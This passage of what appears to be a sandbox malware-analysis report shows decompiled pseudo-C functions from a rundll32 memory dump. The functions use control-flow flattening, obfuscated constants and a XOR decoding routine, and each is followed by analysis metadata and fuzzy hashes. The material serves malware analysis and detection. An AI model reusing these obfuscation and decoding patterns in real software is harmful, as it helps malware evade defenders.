                                                                                                                                    						if(_t266 == 0) {
                                                                                                                                    							E002D8519(_v56, _v84, _v24);
                                                                                                                                    							_t259 = 0xdb1153f;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t259 == 0xab8c2) {
                                                                                                                                    							_t209 =  *0x2e3e10; // 0x0
                                                                                                                                    							E002C8ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                                    							_t212 =  *0x2e3e10; // 0x0
                                                                                                                                    							_t234 = _v16;
                                                                                                                                    							_t264 = _t264 + 0xc;
                                                                                                                                    							_t219 = 1;
                                                                                                                                    							_t259 = 0xc23b37f;
                                                                                                                                    							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t259 == 0x26dca52) {
                                                                                                                                    							_t234 = _v96;
                                                                                                                                    							_t214 = E002CA9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                                    							_t258 = _t214;
                                                                                                                                    							_t264 = _t264 + 0xc;
                                                                                                                                    							if(_t214 == 0) {
                                                                                                                                    								goto L22;
                                                                                                                                    							}
                                                                                                                                    							_t259 = 0xe747a68;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t259 == 0xa9b692f) {
                                                                                                                                    							_t263 = E002CF899(_t234);
                                                                                                                                    							_t259 = 0x26dca52;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t259 != 0xb83ebc6) {
                                                                                                                                    							goto L21;
                                                                                                                                    						} else {
                                                                                                                                    							_t259 = 0xa9b692f;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					if(_t259 == 0xdb1153f) {
                                                                                                                                    						E002C4E7D(_v48, _v32, _t258, _v68);
                                                                                                                                    						_t259 = 0xdb3b1d3;
                                                                                                                                    						goto L21;
                                                                                                                                    					}
                                                                                                                                    					if(_t259 == 0xe566670) {
                                                                                                                                    						_t207 = E002D894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                                    						_t264 = _t264 + 0x10;
                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                    						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					if(_t259 != 0xe747a68) {
                                                                                                                                    						goto L21;
                                                                                                                                    					}
                                                                                                                                    					_t259 = 0xdb1153f;
                                                                                                                                    					if(_v28 > 2) {
                                                                                                                                    						_t218 = E002C4346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                                    						_v24 = _t218;
                                                                                                                                    						_pop(_t234);
                                                                                                                                    						if(_t218 != 0) {
                                                                                                                                    							_t259 = 0xe566670;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					goto L1;
                                                                                                                                    					L21:
                                                                                                                                    				} while (_t259 != 0xdb3b1d3);
                                                                                                                                    				L22:
                                                                                                                                    				return _t219;
                                                                                                                                    			}

                                                                                                                                    0x00000000
                                                                                                                                    0x002da188
                                                                                                                                    0x002da188
                                                                                                                                    0x00000000
                                                                                                                                    0x002da188
                                                                                                                                    0x002da182
                                                                                                                                    0x002da22c
                                                                                                                                    0x002da2c6
                                                                                                                                    0x002da2cd
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2cd
                                                                                                                                    0x002da238
                                                                                                                                    0x002da29a
                                                                                                                                    0x002da29f
                                                                                                                                    0x002da2a6
                                                                                                                                    0x002da2ae
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2ae
                                                                                                                                    0x002da240
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da24b
                                                                                                                                    0x002da250
                                                                                                                                    0x002da265
                                                                                                                                    0x002da26a
                                                                                                                                    0x002da26f
                                                                                                                                    0x002da272
                                                                                                                                    0x002da278
                                                                                                                                    0x002da278
                                                                                                                                    0x002da272
                                                                                                                                    0x00000000
                                                                                                                                    0x002da2d2
                                                                                                                                    0x002da2d2
                                                                                                                                    0x002da2e1
                                                                                                                                    0x002da2e7

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: D1
                                                                                                                                    • API String ID: 0-2215811268
                                                                                                                                    • Opcode ID: 5a9b6df84dd1e6678d31a213cb3fdfc415a21e89e58e306b4bfab1e074da6704
                                                                                                                                    • Instruction ID: ae667547c1c02ba620d0ded123c2893a72b8bc11b741e8d7284ad44579926918
                                                                                                                                    • Opcode Fuzzy Hash: 5a9b6df84dd1e6678d31a213cb3fdfc415a21e89e58e306b4bfab1e074da6704
                                                                                                                                    • Instruction Fuzzy Hash: 9BA142729183018FC318CF65C58981BBBF1BBC4358F54892EF5A996220D7B5CA598F87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E002DBB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				void* _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				unsigned int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				void* _t138;
                                                                                                                                    				intOrPtr _t161;
                                                                                                                                    				void* _t162;
                                                                                                                                    				void* _t164;
                                                                                                                                    				signed int _t181;
                                                                                                                                    				signed int _t182;
                                                                                                                                    				signed int _t183;
                                                                                                                                    				void* _t185;
                                                                                                                                    				signed int* _t189;
                                                                                                                                    
                                                                                                                                    				_t162 = __ecx;
                                                                                                                                    				_push(1);
                                                                                                                                    				_push(1);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t138);
                                                                                                                                    				_v16 = 0xdfc885;
                                                                                                                                    				_t189 =  &(( &_v76)[8]);
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_t185 = 0;
                                                                                                                                    				_t164 = 0xcc97672;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v32 = 0x60c2fa;
                                                                                                                                    				_v32 = _v32 >> 3;
                                                                                                                                    				_v32 = _v32 ^ 0x00046f58;
                                                                                                                                    				_v76 = 0xb548f0;
                                                                                                                                    				_v76 = _v76 >> 0xc;
                                                                                                                                    				_t181 = 0xc;
                                                                                                                                    				_v76 = _v76 * 0x3c;
                                                                                                                                    				_v76 = _v76 + 0xffff64d0;
                                                                                                                                    				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                                    				_v52 = 0x15927a;
                                                                                                                                    				_v52 = _v52 / _t181;
                                                                                                                                    				_v52 = _v52 ^ 0x000151ae;
                                                                                                                                    				_v56 = 0xd6ed9;
                                                                                                                                    				_t182 = 0x1a;
                                                                                                                                    				_v56 = _v56 * 0x3f;
                                                                                                                                    				_v56 = _v56 + 0xfffffbb4;
                                                                                                                                    				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                                    				_v64 = 0xba2b53;
                                                                                                                                    				_v64 = _v64 * 0x6d;
                                                                                                                                    				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                                    				_v64 = _v64 * 0x31;
                                                                                                                                    				_v64 = _v64 ^ 0x981330b4;
                                                                                                                                    				_v60 = 0x269f8;
                                                                                                                                    				_v60 = _v60 >> 5;
                                                                                                                                    				_v60 = _v60 + 0xffffb859;
                                                                                                                                    				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                                    				_v68 = 0xfd9147;
                                                                                                                                    				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                                    				_v68 = _v68 / _t182;
                                                                                                                                    				_v68 = _v68 >> 0xf;
                                                                                                                                    				_v68 = _v68 ^ 0x000df039;
                                                                                                                                    				_v72 = 0x5def36;
                                                                                                                                    				_v72 = _v72 | 0xd620e1c7;
                                                                                                                                    				_v72 = _v72 + 0xd307;
                                                                                                                                    				_t183 = 0x48;
                                                                                                                                    				_v72 = _v72 / _t183;
                                                                                                                                    				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                                    				_v24 = 0xf7704c;
                                                                                                                                    				_v24 = _v24 + 0x27dd;
                                                                                                                                    				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                                    				_v28 = 0x151ed9;
                                                                                                                                    				_v28 = _v28 * 0x48;
                                                                                                                                    				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                                    				_v36 = 0xddc4df;
                                                                                                                                    				_v36 = _v36 >> 0xf;
                                                                                                                                    				_v36 = _v36 | 0x7f83127d;
                                                                                                                                    				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                                    				_v40 = 0x29fd7f;
                                                                                                                                    				_v40 = _v40 >> 7;
                                                                                                                                    				_v40 = _v40 | 0x8d3b2756;
                                                                                                                                    				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                                    				_v44 = 0x8dc5a8;
                                                                                                                                    				_v44 = _v44 * 0x63;
                                                                                                                                    				_v44 = _v44 >> 4;
                                                                                                                                    				_v44 = _v44 ^ 0x036b3557;
                                                                                                                                    				_v48 = 0xd61f7e;
                                                                                                                                    				_v48 = _v48 | 0xd43d52c3;
                                                                                                                                    				_v48 = _v48 + 0xa376;
                                                                                                                                    				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                                    				_t184 = _v20;
                                                                                                                                    				while(_t164 != 0x2524be6) {
                                                                                                                                    					if(_t164 == 0xcc97672) {
                                                                                                                                    						_t164 = 0xe41debb;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t164 == 0xdd773d9) {
                                                                                                                                    							if(E002DD8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                                    								_t164 = 0xe01b1ec;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t164 == 0xe01b1ec) {
                                                                                                                                    								E002E0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                                    								_t189 =  &(_t189[0xa]);
                                                                                                                                    								_t164 = 0x2524be6;
                                                                                                                                    								_t185 =  !=  ? 1 : _t185;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t164 != 0xe41debb) {
                                                                                                                                    									L13:
                                                                                                                                    									if(_t164 != 0x78a313b) {
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t161 = E002C3DE2(_t164);
                                                                                                                                    									_t184 = _t161;
                                                                                                                                    									if(_t161 != 0xffffffff) {
                                                                                                                                    										_t164 = 0xdd773d9;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t185;
                                                                                                                                    				}
                                                                                                                                    				E002D1E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                                    				_t189 =  &(_t189[3]);
                                                                                                                                    				_t164 = 0x78a313b;
                                                                                                                                    				goto L13;
                                                                                                                                    			}






























                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6]
                                                                                                                                    • API String ID: 0-3974934468
                                                                                                                                    • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                    • Instruction ID: 368ac4bd378bfeccdf7f3798b875983fbbf7ac9dcca0a651bfc5f9c99cac62d6
                                                                                                                                    • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                    • Instruction Fuzzy Hash: 4F713071108341AFC359CF26C89981BBBE2FFC9758F504A1EF69696260C372DA598F43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E002C5361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				unsigned int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				unsigned int _v32;
                                                                                                                                    				void* __edx;
                                                                                                                                    				void* _t84;
                                                                                                                                    				void* _t104;
                                                                                                                                    				void* _t118;
                                                                                                                                    				signed int _t120;
                                                                                                                                    				signed int _t121;
                                                                                                                                    				signed int _t122;
                                                                                                                                    				void* _t124;
                                                                                                                                    				signed int* _t127;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				E002D20B9(_t84);
                                                                                                                                    				_v4 = 0x18047d;
                                                                                                                                    				_t127 =  &(( &_v32)[5]);
                                                                                                                                    				_v4 = _v4 >> 0xa;
                                                                                                                                    				_v4 = _v4 ^ 0x000d3248;
                                                                                                                                    				_t124 = 0;
                                                                                                                                    				_v28 = 0x90acd4;
                                                                                                                                    				_t104 = 0x35df4ed;
                                                                                                                                    				_v28 = _v28 >> 5;
                                                                                                                                    				_v28 = _v28 + 0xffff3107;
                                                                                                                                    				_v28 = _v28 | 0xd0f9b279;
                                                                                                                                    				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                                    				_v8 = 0x9d14b7;
                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                    				_v8 = _v8 ^ 0x027823b1;
                                                                                                                                    				_v32 = 0xfd6947;
                                                                                                                                    				_v32 = _v32 + 0xffff03bf;
                                                                                                                                    				_t120 = 0x72;
                                                                                                                                    				_v32 = _v32 / _t120;
                                                                                                                                    				_v32 = _v32 >> 0xa;
                                                                                                                                    				_v32 = _v32 ^ 0x00066e44;
                                                                                                                                    				_v16 = 0x111da;
                                                                                                                                    				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                                    				_v16 = _v16 | 0x7d37165e;
                                                                                                                                    				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                                    				_v12 = 0x2531de;
                                                                                                                                    				_v12 = _v12 << 0xd;
                                                                                                                                    				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                                    				_v20 = 0x6e0002;
                                                                                                                                    				_v20 = _v20 >> 0xe;
                                                                                                                                    				_t121 = 0xe;
                                                                                                                                    				_v20 = _v20 / _t121;
                                                                                                                                    				_t122 = 0x3d;
                                                                                                                                    				_v20 = _v20 * 0x64;
                                                                                                                                    				_v20 = _v20 ^ 0x000bef19;
                                                                                                                                    				_v24 = 0xa3fc95;
                                                                                                                                    				_v24 = _v24 + 0xdcd1;
                                                                                                                                    				_v24 = _v24 << 3;
                                                                                                                                    				_v24 = _v24 / _t122;
                                                                                                                                    				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                                    				while(_t104 != 0x311781) {
                                                                                                                                    					if(_t104 == 0x35df4ed) {
                                                                                                                                    						_push(_t104);
                                                                                                                                    						_push(_t104);
                                                                                                                                    						_t118 = 0x28;
                                                                                                                                    						 *0x2e3e08 = E002C7FF2(_t118);
                                                                                                                                    						_t104 = 0x605992c;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t104 == 0x477ef52) {
                                                                                                                                    							E002C924B();
                                                                                                                                    							_t104 = 0x311781;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t104 == 0x605992c) {
                                                                                                                                    								if(E002E0F33() != 0) {
                                                                                                                                    									_t104 = 0xdb1ba22;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t104 != 0xdb1ba22) {
                                                                                                                                    									L13:
                                                                                                                                    									if(_t104 != 0x5723dc8) {
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t124 = E002C960D(_v16, _a12, _a8, _v12);
                                                                                                                                    									_t127 =  &(_t127[3]);
                                                                                                                                    									if(_t124 == 0) {
                                                                                                                                    										_t104 = 0x477ef52;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t124;
                                                                                                                                    				}
                                                                                                                                    				E002D8519(_v20, _v24,  *0x2e3e08);
                                                                                                                                    				_t104 = 0x5723dc8;
                                                                                                                                    				goto L13;
                                                                                                                                    			}





















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: H2
                                                                                                                                    • API String ID: 0-302591398
                                                                                                                                    • Opcode ID: 9862f0ea6672e2f811f0d1c2d4ea82458ae0bac8a68c5d310a1e258e76fbdb8c
                                                                                                                                    • Instruction ID: 9951ab4db72eae75ff912e50cb727e52b26a719dfe719ba89147600b5d08a333
                                                                                                                                    • Opcode Fuzzy Hash: 9862f0ea6672e2f811f0d1c2d4ea82458ae0bac8a68c5d310a1e258e76fbdb8c
                                                                                                                                    • Instruction Fuzzy Hash: F541CD322183019FC728CF25E48992FBBE1FBD8758F144A1DF58556220D7B0DA98CB83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002C8B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				void* _t83;
                                                                                                                                    				void* _t89;
                                                                                                                                    				signed int _t93;
                                                                                                                                    				void* _t96;
                                                                                                                                    				void* _t108;
                                                                                                                                    				void* _t109;
                                                                                                                                    				void* _t111;
                                                                                                                                    				void* _t112;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t108 = __ecx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t83);
                                                                                                                                    				_v72 = 0xbb1237;
                                                                                                                                    				_t112 = _t111 + 0x18;
                                                                                                                                    				_v72 = _v72 >> 0xf;
                                                                                                                                    				_v72 = _v72 + 0xd544;
                                                                                                                                    				_t109 = 0;
                                                                                                                                    				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                                    				_t96 = 0x815a082;
                                                                                                                                    				_v48 = 0x50cb35;
                                                                                                                                    				_v48 = _v48 + 0xffff87ec;
                                                                                                                                    				_v48 = _v48 ^ 0x00585237;
                                                                                                                                    				_v52 = 0xa4cd83;
                                                                                                                                    				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                                    				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                                    				_v56 = 0xbe8ecf;
                                                                                                                                    				_v56 = _v56 << 0xe;
                                                                                                                                    				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                                    				_v60 = 0x771210;
                                                                                                                                    				_v60 = _v60 | 0x3e44f288;
                                                                                                                                    				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                                    				_v80 = 0xf3b10d;
                                                                                                                                    				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                                    				_v80 = _v80 >> 4;
                                                                                                                                    				_v80 = _v80 + 0xffffd90b;
                                                                                                                                    				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                                    				_v64 = 0x352515;
                                                                                                                                    				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                                    				_v64 = _v64 + 0x1326;
                                                                                                                                    				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                                    				_v68 = 0x4f62f3;
                                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                                    				_v68 = _v68 ^ 0x83faab25;
                                                                                                                                    				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                                    				_v76 = 0x2ac691;
                                                                                                                                    				_v76 = _v76 << 9;
                                                                                                                                    				_t93 = 0x6b;
                                                                                                                                    				_v76 = _v76 / _t93;
                                                                                                                                    				_v76 = _v76 << 0xc;
                                                                                                                                    				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                                    				do {
                                                                                                                                    					while(_t96 != 0x54856a9) {
                                                                                                                                    						if(_t96 == 0x815a082) {
                                                                                                                                    							_t96 = 0x54856a9;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t96 == 0xa9da54a) {
                                                                                                                                    								_t89 = E002DD97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                                    								_t112 = _t112 + 0xc;
                                                                                                                                    								__eflags = _t89;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t96 = 0xefea9c1;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t118 = _t96 - 0xefea9c1;
                                                                                                                                    								if(_t96 != 0xefea9c1) {
                                                                                                                                    									goto L11;
                                                                                                                                    								} else {
                                                                                                                                    									E002DD97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                                    									_t109 =  !=  ? 1 : _t109;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L6:
                                                                                                                                    						return _t109;
                                                                                                                                    					}
                                                                                                                                    					E002C3DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                                    					_t112 = _t112 + 0xc;
                                                                                                                                    					_t96 = 0xa9da54a;
                                                                                                                                    					L11:
                                                                                                                                    					__eflags = _t96 - 0x309e957;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L6;
                                                                                                                                    			}


                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 7RX
                                                                                                                                    • API String ID: 0-861457431
                                                                                                                                    • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                    • Instruction ID: 177e8f6aefa21c6e02726c3fa26f234760014382f1f7ec445b7ee3218ecd5556
                                                                                                                                    • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                                    • Instruction Fuzzy Hash: 63419871119702DBC798CE21C48992FBBE1FBC4788F104A1DF59652220D771CA29CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D7BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				void* _t53;
                                                                                                                                    				signed int _t60;
                                                                                                                                    				signed int _t67;
                                                                                                                                    				unsigned int _t71;
                                                                                                                                    				signed int _t74;
                                                                                                                                    				signed int _t76;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				void* _t85;
                                                                                                                                    				signed int _t92;
                                                                                                                                    				void* _t98;
                                                                                                                                    				intOrPtr _t99;
                                                                                                                                    				signed int* _t100;
                                                                                                                                    				signed int* _t101;
                                                                                                                                    				signed int* _t102;
                                                                                                                                    
                                                                                                                                    				_t100 = _a8;
                                                                                                                                    				_t102 = __ecx;
                                                                                                                                    				_push(_t100);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t53);
                                                                                                                                    				_v12 = 0x7b3704;
                                                                                                                                    				_t99 = 0;
                                                                                                                                    				_v8 = 0x80915f;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_v24 = 0xa71362;
                                                                                                                                    				_v24 = _v24 << 0xb;
                                                                                                                                    				_v24 = _v24 + 0x3e5;
                                                                                                                                    				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                                    				_v28 = 0xc4b4e;
                                                                                                                                    				_t76 = 0x2f;
                                                                                                                                    				_v28 = _v28 * 0x14;
                                                                                                                                    				_v28 = _v28 | 0x55175d82;
                                                                                                                                    				_v28 = _v28 ^ 0x65144985;
                                                                                                                                    				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                                    				_a8 = 0x3b45b7;
                                                                                                                                    				_a8 = _a8 / _t76;
                                                                                                                                    				_a8 = _a8 << 4;
                                                                                                                                    				_t77 = 0x6c;
                                                                                                                                    				_a8 = _a8 / _t77;
                                                                                                                                    				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                                    				_t60 =  *_t100;
                                                                                                                                    				_t101 =  &(_t100[2]);
                                                                                                                                    				_t92 = _t100[1] ^ _t60;
                                                                                                                                    				_v20 = _t60;
                                                                                                                                    				_v16 = _t92;
                                                                                                                                    				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                                    				_t67 = E002C7FF2(_t71);
                                                                                                                                    				_a8 = _t67;
                                                                                                                                    				if(_t67 != 0) {
                                                                                                                                    					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                                    					if(_t98 != 0) {
                                                                                                                                    						_t74 = _v20;
                                                                                                                                    						_t85 = _t67 - _t101;
                                                                                                                                    						do {
                                                                                                                                    							_t99 = _t99 + 1;
                                                                                                                                    							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                                    							_t101 =  &(_t101[1]);
                                                                                                                                    						} while (_t99 < _t98);
                                                                                                                                    						_t67 = _a8;
                                                                                                                                    					}
                                                                                                                                    					if(_t102 != 0) {
                                                                                                                                    						 *_t102 = _v16;
                                                                                                                                    						return _t67;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t67;
                                                                                                                                    			}


                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
